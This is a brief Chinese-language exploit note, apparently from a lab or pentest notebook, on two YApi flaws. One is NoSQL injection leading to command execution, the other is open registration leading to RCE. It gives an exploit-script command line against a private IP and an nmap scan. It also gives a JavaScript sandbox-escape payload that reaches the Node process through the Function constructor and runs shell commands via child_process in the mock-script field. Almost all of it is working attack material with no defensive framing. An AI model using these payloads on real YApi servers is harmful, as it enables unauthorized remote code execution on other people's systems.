(YApi NoSQL注入)(YApi注册导致RCE)

YApi NoSQL注入导致远程命令执行漏洞

payload：python3 YApi-NoSQL.py –debug one4all -u http://192.168.85.130:3000/

YApi开放注册导致RCE

信息收集：nmap 192.168.85.130 -p 3000 -A

const sandbox = this       
const ObjectConstructor = this.constructor       
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')        
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("id;uname -a;pwd").toString()